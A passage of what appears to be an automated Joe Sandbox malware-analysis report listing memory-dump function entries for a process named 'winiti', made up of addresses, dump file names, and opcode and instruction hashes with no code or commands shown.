                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                              Function 00D810D0 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                              • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                              • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                              • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                              Function 00D81148 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                              • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                              • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                              • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                              Function 00D7F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                              • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                              • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                              • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                              Function 00D7F900 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                              Function 00D81930 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                              • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                              • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                              • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                              Function 00D7F938 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                              • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                              • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                              • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                              Function 00D7FAD0 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                              Function 00D7FAB8 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                              Function 00D7FA50 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                              • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                              Function 00D7FA20 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                              • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                              • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                              • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                              Function 00D7FBE8 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                              • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                              • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                              • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                              Function 00D7FBB8 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                              Function 00D7FB50 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                              Function 00D7FC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                              Function 00D7FC48 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                              Function 00D7FC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                              Function 00D7FC30 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                              Function 00D81D80 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                              Function 00D7FD8C Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
